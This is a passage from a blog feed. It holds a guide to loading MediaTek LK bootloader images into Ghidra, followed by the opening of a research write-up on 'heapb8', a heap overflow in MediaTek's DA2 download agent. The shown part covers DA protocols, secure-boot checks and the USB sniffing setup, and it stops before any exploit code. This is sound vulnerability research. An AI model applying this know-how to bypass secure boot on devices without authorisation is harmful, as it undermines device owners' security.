&lt;p&gt;MediaTek uses a bootloader called LK (Little Kernel) on most of its Android devices, although some platforms may use alternatives like u-boot.&lt;/p&gt;
&lt;p&gt;LK typically acts as the third-stage bootloader and runs in S-EL1 (Secure EL1) on ARMv8 devices, and in PL1 (Supervisor mode) on ARMv7 devices. If we follow ARM naming conventions, this would be &lt;code&gt;BL33&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;There are two main variants of LK:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Legacy LK&lt;/strong&gt; (v1.0): Found on older devices. These are typically paired with V3 (legacy) or V5 (XFLASH) DA protocols. LK runs in ARMv7 mode, even on SoCs that support ARMv8.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Modern LK&lt;/strong&gt; (v2.0): Used on newer devices, typically paired with the V6 (XML) DA protocol. It runs in ARMv8 mode with the MMU enabled, inside a virtual memory space.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The LK image you find on a MediaTek device is packed and contains multiple sub-partitions. The exact number depends mostly on the LK variant.&lt;/p&gt;
&lt;p&gt;Legacy LK usually includes &lt;code&gt;lk&lt;/code&gt; and &lt;code&gt;lk_main_dtb&lt;/code&gt;, while modern LK includes &lt;code&gt;lk&lt;/code&gt;, &lt;code&gt;bl2_ext&lt;/code&gt;, &lt;code&gt;aee&lt;/code&gt;, &lt;code&gt;lk_main_dtb&lt;/code&gt;, and &lt;code&gt;lk_dtbo&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Each partition has its own header defining size and other runtime parameters, and in most cases also includes two associated certificates (&lt;code&gt;cert1&lt;/code&gt; and &lt;code&gt;cert2&lt;/code&gt;) used for verification as part of the secure boot chain.&lt;/p&gt;
&lt;p&gt;This is pretty obvious (and, in my opinion, a bit stupid), but some people still get confused: &lt;strong&gt;the file extension does not really matter.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can list the sub-partitions in your image using lkpatcher:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 -m lkpatcher lk.bin --list-partitions
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from pacman.bin with 5 partitions (version 2)

Partitions in bootloader image:
----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Instructions&lt;/h1&gt;
&lt;p&gt;Depending on the image you have, the exact steps may vary, but the general process is similar.&lt;/p&gt;
&lt;h2&gt;Extracting the actual LK binary&lt;/h2&gt;
&lt;p&gt;Start by extracting the actual &lt;code&gt;lk&lt;/code&gt; sub-partition from the image. You can do this with lkpatcher:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 -m lkpatcher lk.bin -d lk
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from lk.bin with 2 partitions (version 1)
========================================
Partition Name  : lk
Data Size       : 1246148 bytes
Addressing Mode : 0xffffffff
Memory Address  : 0x4c400000
========================================
[INFO] Successfully dumped partition lk to lk_lk.bin
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will give you a file called &lt;code&gt;lk_lk.bin&lt;/code&gt;, which is the actual LK binary we want to reverse engineer.&lt;/p&gt;
&lt;p&gt;Make sure to note down the &lt;code&gt;Memory Address&lt;/code&gt; from the output, as this is the base address where the binary is loaded in memory. This will be important later during analysis.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Also note down the version of the LK (v1.0 or v2.0)&lt;/strong&gt; as this determines the architecture and some of the techniques we&apos;ll use later on.&lt;/p&gt;
&lt;p&gt;For version 2 (modern) LKs, you might see a very large memory address (e.g. &lt;code&gt;0xffff000050f00000&lt;/code&gt;), which is completely normal, don&apos;t worry about it.&lt;/p&gt;
&lt;h2&gt;Loading the Binary in Ghidra&lt;/h2&gt;
&lt;p&gt;If you haven&apos;t already, create a new Ghidra project. Give it a name and choose where to store it.&lt;/p&gt;
&lt;p&gt;Drag and drop the &lt;code&gt;lk_lk.bin&lt;/code&gt; file into the project window. This will open the &quot;Import File&quot; dialog.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import1.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The only thing we need to configure here is the &lt;code&gt;Language&lt;/code&gt; option. &lt;strong&gt;Everything else can stay as is.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Click the three dots next to the &lt;code&gt;Language&lt;/code&gt; field to open the &quot;Select Language&quot; dialog. From here, choose the correct architecture for your binary:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;If you&apos;re working with a legacy LK (v1.0)&lt;/strong&gt;, select &lt;code&gt;ARM:LE:32:v7:default&lt;/code&gt;, as it runs in &lt;strong&gt;ARMv7&lt;/strong&gt; mode.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;If you&apos;re working with a modern LK (v2.0)&lt;/strong&gt;, select &lt;code&gt;AARCH64:LE:64:v8A:default&lt;/code&gt;, as it runs in &lt;strong&gt;ARMv8&lt;/strong&gt; mode.&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;ARMv7 (Legacy LK)&lt;/th&gt;
&lt;th&gt;ARMv8 (Modern LK)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import_armv7.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import_armv8.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;If selected correctly, it&apos;ll look like this (the Language will differ if you&apos;re dealing with a modern LK):&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import2.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Simply click &lt;code&gt;OK&lt;/code&gt; and wait for the file to be imported into the project.&lt;/p&gt;
&lt;h2&gt;Analyzing the Binary&lt;/h2&gt;
&lt;p&gt;After importing the file, it will appear in your project view. Double click it to open it in the CodeBrowser.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_project_view.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;You&apos;ll be prompted to run auto-analysis. It is important that you choose &lt;code&gt;No&lt;/code&gt; here, as we still need to configure a few things first. Running it now will only cause confusion and make things harder.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_auto_analysis_prompt.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Since we chose not to run auto-analysis, go to the top menu bar and locate the icon that looks like a RAM stick. Click it to open the &lt;code&gt;Memory Map&lt;/code&gt; window.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_memory_map_icon.png&quot; width=&quot;90%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the Memory Map, select the &quot;ram&quot; section and disable the &quot;W&quot; (write) permission, which is enabled by default. Only &quot;R&quot; (read) and &quot;X&quot; (execute) should remain enabled.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_memory_map.png&quot; width=&quot;90%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the same window, locate the house icon, which opens the &quot;Image Base Address&quot; dialog.&lt;/p&gt;
&lt;p&gt;Click it and set the base address to the &lt;code&gt;Memory Address&lt;/code&gt; you noted earlier when extracting the binary with lkpatcher (e.g. &lt;code&gt;0x4c400000&lt;/code&gt; or &lt;code&gt;0xffff000050f00000&lt;/code&gt;).&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_image_base.png&quot; width=&quot;50%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Click the &lt;code&gt;Save&lt;/code&gt; icon in the top left corner to apply the changes, then close the Memory Map window and return to the CodeBrowser.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_save_icon.png&quot; width=&quot;65%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the CodeBrowser, go to the top menu bar and click &lt;code&gt;Edit&lt;/code&gt; &amp;gt; &lt;code&gt;Tool Options&lt;/code&gt; to open the Tool Options dialog.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_tool_options_menu.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Search for &quot;Unreachable&quot;, then go to &lt;code&gt;Decompiler &amp;gt; Analysis&lt;/code&gt; and disable the &quot;Eliminate Unreachable Code&quot; option (enabled by default). Click &lt;code&gt;Apply&lt;/code&gt;, then &lt;code&gt;OK&lt;/code&gt; to save.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_unreachable_code.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Finally, trigger auto-analysis by pressing &lt;code&gt;A&lt;/code&gt; in the main CodeBrowser window. In the dialog that appears, leave everything as is and click &lt;code&gt;OK&lt;/code&gt;.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_auto_analysis.png&quot; width=&quot;90%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;If everything was done correctly, once the analysis finishes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;For legacy LKs (v1.0), in the listing (ASM) view you should see a vector table, and in the Decompiler view you should see an unnamed function that sets up the stack, BSS, and other sections.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;For modern (v2.0) LKs, you won&apos;t see a vector table, but you should still see the unnamed function that sets up the stack, BSS, and other sections.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Legacy LK (v1.0)&lt;/th&gt;
&lt;th&gt;Modern LK (v2.0)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_legacy_lk_entrypoint.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_modern_lk_entrypoint.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;That should be it. This guide was meant to be concise, so there’s not much more to explain here. You should now have an easier time understanding what certain functions do and how the bootloader works.&lt;/p&gt;
&lt;h2&gt;ARMv8 Bonus: Ghidra Script&lt;/h2&gt;
&lt;p&gt;If you&apos;re working with ARMv8 (modern) LKs, I have a Ghidra script that can speed things up quite a bit.&lt;/p&gt;
&lt;p&gt;It automatically resolves and renames a number of commonly used functions (like &lt;code&gt;lk_main&lt;/code&gt;, &lt;code&gt;dprintf&lt;/code&gt;, &lt;code&gt;fastboot_*&lt;/code&gt;, init functions, etc.), and also defines some basic structs and enums to make the decompilation output cleaner.&lt;/p&gt;
&lt;p&gt;You can use it by doing the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Add the script to your Ghidra scripts directory (via Script Manager -&amp;gt; Script Directories).&lt;/li&gt;
&lt;li&gt;Load and analyze your LK binary as shown above.&lt;/li&gt;
&lt;li&gt;Run the script from the Script Manager.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;More details and the script are available &lt;a href=&quot;https://github.com/R0rt1z2/ghidra-scripts/tree/main?tab=readme-ov-file#mediateklittlekernelpy&quot;&gt;in my GitHub repository&lt;/a&gt;.&lt;/p&gt;
</content:encoded></item><item><title>Exploiting MediaTek&apos;s Download Agent</title><link>https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/</guid><description>Analysis and exploitation of MediaTek&apos;s second stage Download Agent</description><pubDate>Fri, 30 Jan 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;In September 2025, Chimera quietly &lt;a href=&quot;https://www.facebook.com/chimeratool/posts/pfbid0R9ETZbBPQEj2cZhnhRBJWr6YLfCHkBfyogXsR1uLUZMUpY3v6EA6zt7rYzgzoMY7l&quot;&gt;announced&lt;/a&gt; &quot;world-first&quot; support for MediaTek&apos;s latest Dimensity 9400 and 8400 SoCs running DAs compiled months after MediaTek had patched &lt;a href=&quot;https://penumbra.itssho.my/Mediatek/Exploits/Carbonara&quot;&gt;Carbonara&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So we figured they&apos;d either found a way around the patches, or they were sitting on something entirely new. &lt;strong&gt;We had to find out.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Shortly after &lt;a href=&quot;https://github.com/shomykohai&quot;&gt;shomy&lt;/a&gt; &lt;a href=&quot;https://web.archive.org/web/20260114133700/https://github.com/bkerler/mtkclient/pull/1558&quot;&gt;opened a PR adding Carbonara support to MTKClient&lt;/a&gt;, someone left a comment with a USB capture of Chimera and a note:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/github-comment.png&quot; alt=&quot;GitHub comment referencing the Chimera exploit&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So we did.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;What followed was months of USB packet captures, late-night reversing sessions, and way too many crashes and reboots, all done together with &lt;a href=&quot;https://github.com/shomykohai&quot;&gt;shomy&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;What we eventually found was &lt;strong&gt;heapb8&lt;/strong&gt; (&lt;em&gt;/ˈhiːpbeɪt/&lt;/em&gt;, &quot;heap-bait&quot;), a heap overflow in DA2&apos;s USB file download handler that allows arbitrary code execution on V6 devices patched against Carbonara.&lt;/p&gt;
&lt;p&gt;In this post, we&apos;ll walk through how we went from noticing Chimera&apos;s suspicious update to achieving code execution on modern MediaTek SoCs.&lt;/p&gt;
&lt;p&gt;It&apos;s a long and fairly technical write-up, so take a seat. I&apos;ve tried to keep it readable, but it&apos;s still a deep dive.&lt;/p&gt;
&lt;h1&gt;Background&lt;/h1&gt;
&lt;p&gt;MediaTek devices have two different USB download modes exposed by different boot stages: BootROM and Preloader.&lt;/p&gt;
&lt;p&gt;For the past few years, tools like &lt;a href=&quot;https://github.com/bkerler/mtkclient&quot;&gt;MTKClient&lt;/a&gt; have been exploiting vulnerabilities in the BootROM&apos;s USB stack to gain code execution.&lt;/p&gt;
&lt;p&gt;However, MediaTek patched most of these vulnerabilities in newer SoCs, and to make matters worse, a lot of OEMs opted to disable BootROM USBDL entirely on their devices, leaving Preloader USBDL as the only option.&lt;/p&gt;
&lt;h2&gt;Download Agents&lt;/h2&gt;
&lt;p&gt;Since this writeup focuses on DA2 exploitation, let&apos;s briefly cover how MediaTek&apos;s Download Agents work.&lt;/p&gt;
&lt;p&gt;To interact with the device in either of these modes, MediaTek uses Download Agents (DAs). DAs are small programs that run on the device and handle USB communication, flashing, and other low-level operations.&lt;/p&gt;
&lt;p&gt;Each DA is built for a specific chipset (identified by its hardware code), though some DA files like &lt;code&gt;MTK_AllInOne_DA.bin&lt;/code&gt; bundle multiple chipsets into a single binary.&lt;/p&gt;
&lt;p&gt;There are three main DA protocol versions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Legacy (V3)&lt;/strong&gt;: Codename &lt;em&gt;himalaya&lt;/em&gt;. Found on older devices (MT65XX series).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://penumbra.itssho.my/Mediatek/Common/DA/XFlash-DA-Protocol&quot;&gt;XFlash (V5)&lt;/a&gt;&lt;/strong&gt;: Codename &lt;em&gt;raphael&lt;/em&gt;. Found on devices released between 2016 and ~2022.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://penumbra.itssho.my/Mediatek/Common/DA/XML-DA-Protocol&quot;&gt;XML (V6)&lt;/a&gt;&lt;/strong&gt;: Codename &lt;em&gt;chimaera&lt;/em&gt;. Found on modern devices, mainly Dimensity and newer Helio chips.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;heapb8 targets the XML (V6) DA protocol, so that&apos;s what we&apos;ll focus on.&lt;/p&gt;
&lt;h3&gt;Structure&lt;/h3&gt;
&lt;p&gt;The DA file starts with a 0x6C byte header containing the magic string &lt;code&gt;MTK_DOWNLOAD_AGENT&lt;/code&gt; (or &lt;code&gt;MTK_DA_v6&lt;/code&gt; for V6), a version number, and the number of supported SoCs.&lt;/p&gt;
&lt;p&gt;Following the header is an array of DA entries, one per chipset. Each entry contains the hardware code, sub-code, and a list of regions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Region 0&lt;/strong&gt;: Loader/stub (small bootstrap code)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Region 1&lt;/strong&gt;: DA1&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Region 2&lt;/strong&gt;: DA2&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each region has an offset, length, load address, and signature length. The signature (if present) is appended at the end of the region data.&lt;/p&gt;
&lt;h3&gt;DA1 and DA2&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;DA1&lt;/strong&gt;: Handles early hardware initialization (PLL, PMIC, storage, DRAM) and USB communication setup. Its main job is to prepare the device and load DA2.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DA2&lt;/strong&gt;: Runs a small multithreaded kernel and handles the actual device operations, flashing, reading partitions, security checks, and everything else you&apos;d expect from a flash tool.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;heapb8 targets DA2, specifically its USB file download handler.&lt;/p&gt;
&lt;h3&gt;Uploading the DA(s)&lt;/h3&gt;
&lt;p&gt;MediaTek has 3 different security mechanisms in both BootROM and Preloader:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Secure Boot Control (SBC)&lt;/strong&gt;: Controls whether the current stage verifies the next stage of the boot chain. For BootROM, this means verifying Preloader. For Preloader, this means verifying LK or bl2_ext based on a security policy table.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Serial Link Authorization (SLA)&lt;/strong&gt;: Authenticates the host before allowing operations. There are two types:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;BROM SLA&lt;/strong&gt;: The BootROM sends a challenge that must be signed with an OEM-held key. MediaTek&apos;s implementation is a bit unusual, instead of standard RSA signing, they swap the public and private exponents.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DA SLA&lt;/strong&gt;: Introduced in V5 (raphael). If the DA is compiled with &lt;code&gt;DA_ENABLE_SECURITY&lt;/code&gt;, most commands are locked behind authentication. The host must call &lt;code&gt;CMD_SECURITY_GET_DEV_FW_INFO&lt;/code&gt; to get device info, sign it, then call &lt;code&gt;CMD_SECURITY_SET_FLASH_POLICY&lt;/code&gt; with the signed response. If valid, the DA registers the protected commands. You can check if DA SLA is enabled by reading the &lt;code&gt;DA.SLA&lt;/code&gt; system property.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Download Agent Authentication (DAA)&lt;/strong&gt;: Verifies the DA&apos;s signature before loading it. This is done by checking the signature appended to the DA against a trusted key before allowing execution.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;After handshaking (and BROM SLA if enabled), the host issues &lt;code&gt;CMD_SEND_DA&lt;/code&gt; (0xD7) to upload DA1. If DAA is enabled, the signature is verified before setting the &lt;code&gt;g_da_verified&lt;/code&gt; flag.&lt;/p&gt;
&lt;p&gt;The host then issues &lt;code&gt;CMD_JUMP_DA&lt;/code&gt; (0xD5) to transfer execution, but only if &lt;code&gt;g_da_verified&lt;/code&gt; is set, otherwise the device asserts and reboots.&lt;/p&gt;
&lt;p&gt;Once DA1 is running, a similar process repeats: DA1 verifies and loads DA2 using &lt;code&gt;CMD_BOOT_TO&lt;/code&gt;, then jumps to it.&lt;/p&gt;
&lt;h1&gt;Chimera&lt;/h1&gt;
&lt;p&gt;Our target was relatively clear: figure out how Chimera was exploiting patched DAs. The first step was to capture USB traffic between Chimera and a target device.&lt;/p&gt;
&lt;p&gt;For our target, we went with the Nothing Phone 2A, it runs a MediaTek Dimensity 7200 Pro and is listed under Chimera&apos;s supported devices.&lt;/p&gt;
&lt;p&gt;Chimera is one of the more &quot;premium&quot; GSM tools out there, and it shows; VM detection, USB packet capture detection, and various other anti-analysis techniques make it clear the developers have put real effort into preventing reverse engineering.&lt;/p&gt;
&lt;h2&gt;USB Capture&lt;/h2&gt;
&lt;p&gt;Chimera&apos;s anti-analysis means you can&apos;t just fire up Wireshark and start capturing packets. Instead, we relied on a &lt;a href=&quot;https://www.totalphase.com/products/beagle-usb480/&quot;&gt;physical USB sniffer&lt;/a&gt; to capture traffic between Chimera and the device.&lt;/p&gt;
&lt;p&gt;We&apos;ve used this device before and it works well, though I&apos;ll admit it&apos;s absurdly expensive. You could probably hack together a cheaper alternative, but that&apos;s a project for another day.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://www.totalphase.com/media/catalog/product/b/e/beagle480std-rgb144.jpg&quot; width=&quot;50%&quot; alt=&quot;Beagle USB 480&quot; /&gt;
&lt;/div&gt;
&lt;h2&gt;UART&lt;/h2&gt;
&lt;p&gt;Capturing USB traffic is only half the battle, we also needed to see what the DA was doing on the device itself. For that, we used UART.&lt;/p&gt;
&lt;p&gt;Thankfully, &lt;a href=&quot;http://github.com/AntiEngineer&quot;&gt;@AntiEngineer&lt;/a&gt; had already spent hours probing the board with a logic analyzer to find the UART pins. He put together a nice setup that proved invaluable for this research.&lt;/p&gt;
&lt;p&gt;On the Nothing Phone 2A, UART is accessible through two small pads behind the main camera module:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Motherboard&lt;/th&gt;
&lt;th&gt;UART pins&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/MEWOTHING_2aP.png&quot; alt=&quot;Nothing Phone 2A motherboard&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/MEWOTHING_2aP_label.png&quot; alt=&quot;Nothing Phone 2A motherboard with UART pins labeled&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;BROM outputs UART at &lt;code&gt;115200&lt;/code&gt; &lt;strong&gt;8N1&lt;/strong&gt;, while everything that comes after (Preloader, DAs, etc.) runs at &lt;code&gt;921600&lt;/code&gt; &lt;strong&gt;8N1&lt;/strong&gt; by default.&lt;/p&gt;
&lt;p&gt;We used a &lt;a href=&quot;https://www.amazon.es/-/en/Fasizi-Converter-CH340G-Serial-Adapter/dp/B09Z2GZVZY&quot;&gt;cheap TTL-USB adapter&lt;/a&gt; to connect the pads to our computer. For serial interaction, I personally recommend &lt;a href=&quot;https://github.com/tio/tio&quot;&gt;tio&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;One annoying quirk about this device (and probably many others) is that UART logs get cut off during Preloader initialization as soon as you see the &lt;code&gt;Log Turned Off.&lt;/code&gt; message.&lt;/p&gt;
&lt;p&gt;This is controlled by a global variable called &lt;code&gt;g_log_switch&lt;/code&gt;. During boot, the Preloader checks if a certain key combination is held (usually volume up or down) and sets the switch accordingly.&lt;/p&gt;
&lt;p&gt;If the switch is off, &lt;code&gt;outchar()&lt;/code&gt; skips calling &lt;code&gt;PutUARTByte()&lt;/code&gt; entirely, so nothing gets printed. The logs are still written to a DRAM buffer, but you won&apos;t see them over UART:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void outchar(const char c)
{
    if (g_log_disable) {
        if (log_ptr &amp;lt; log_end)
            *log_ptr++ = (char)c;
        else
            g_log_miss_chrs++;
    } else {
        if (get_log_switch()) {
            PutUARTByte(c);
#if (CFG_DRAM_LOG_TO_STORAGE)
            log_to_storage(c);
#endif
        }
        pl_log_store(c);
    }

#if (CFG_OUTPUT_PL_LOG_TO_UART1)
	PutUART1_Byte(c);
#endif
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Getting the Capture&lt;/h2&gt;
&lt;p&gt;With our capture environment set up, we proceeded to capture a full Chimera session. I&apos;d like to thank &lt;a href=&quot;https://t.me/erdilS&quot;&gt;@erdilS&lt;/a&gt; for lending us his Chimera license for this research :)!&lt;/p&gt;
&lt;p&gt;The tool is expensive, and I wasn&apos;t about to spend that much money for what was supposed to be a simple one-off analysis (spoiler: it wasn&apos;t :D).&lt;/p&gt;
&lt;p&gt;The capture uses a proprietary format that can only be opened with &lt;a href=&quot;https://www.totalphase.com/products/data-center/&quot;&gt;Total Phase&apos;s Data Center&lt;/a&gt; software. It&apos;s not as fancy as Wireshark, but it gets the job done.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/data-center-01.png&quot; alt=&quot;Data Center screenshot&quot; /&gt;&lt;/p&gt;
&lt;h1&gt;Dissecting the Exploit&lt;/h1&gt;
&lt;p&gt;With the capture in hand, it was time to figure out what Chimera was actually doing.&lt;/p&gt;
&lt;p&gt;The plan was simple, or so we thought: extract the DAs, compare them against known good copies, and trace through the USB traffic to find where things get interesting.&lt;/p&gt;
&lt;h2&gt;Extracting the DAs&lt;/h2&gt;
&lt;p&gt;The first thing we did was extract both DAs from the capture and compare them against &lt;a href=&quot;https://archive.diablosat.cc/firmwares/amt-dumps/NothingDA/MT6886_NOTHING_0.bin&quot;&gt;the ones we had previously dumped from the official Nothing Flash Tool&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The hashes matched, so Chimera is using unmodified DAs with the same build date as the official tool:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;============================================================
DA Header Type: V6
Number of SoCs: 1
============================================================
[SoC 0]
  DA Mode: V6
  HW Code     : 0x1229
  HW Sub Code : 0x8A00
  Magic       : 0xDADA
  Regions     : 3
  Region 0: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 1: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 2: Offset: 0x96EBC, Length: 0x59930, Addr: 0x40000000, Region Length: 0x59830, Sig Len: 0x100
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks to this, we know we&apos;re dealing with a V6 DA built for HW code &lt;code&gt;0x1229&lt;/code&gt; (Dimensity 7200 / 7200 Pro). To load them in Ghidra, use base address &lt;code&gt;0x2000000&lt;/code&gt; for DA1 and &lt;code&gt;0x40000000&lt;/code&gt; for DA2.&lt;/p&gt;
&lt;p&gt;One thing worth noting is that V6 DAs can run in either ARM64 or ARM32 (non-THUMB) mode, which made porting the exploit a bit annoying later on.&lt;/p&gt;
&lt;p&gt;In our specific case, both stages are ARM64, so we analyze them as AARCH64 (ARMv8) Little Endian.&lt;/p&gt;
&lt;h2&gt;Tracing the USB Traffic&lt;/h2&gt;
&lt;p&gt;We started by analyzing the full boot sequence: Preloader receiving DA1 over USB, verifying its signature, and jumping to it.&lt;/p&gt;
&lt;p&gt;Then DA1 does the same for DA2: receives it, verifies it, and transfers execution. Nothing unusual there, everything looked standard (mind you, we really wasted an entire night analyzing ~37100 packets of boring USB traffic).&lt;/p&gt;
&lt;p&gt;While running Chimera, I also tried to catch UART logs hoping for some useful debug output, but it ended up being useless. They set the log level to &lt;code&gt;ERROR&lt;/code&gt; right after DA1 starts using &lt;code&gt;CMD:SET-RUNTIME-PARAMETER&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;da&amp;gt;
    &amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;
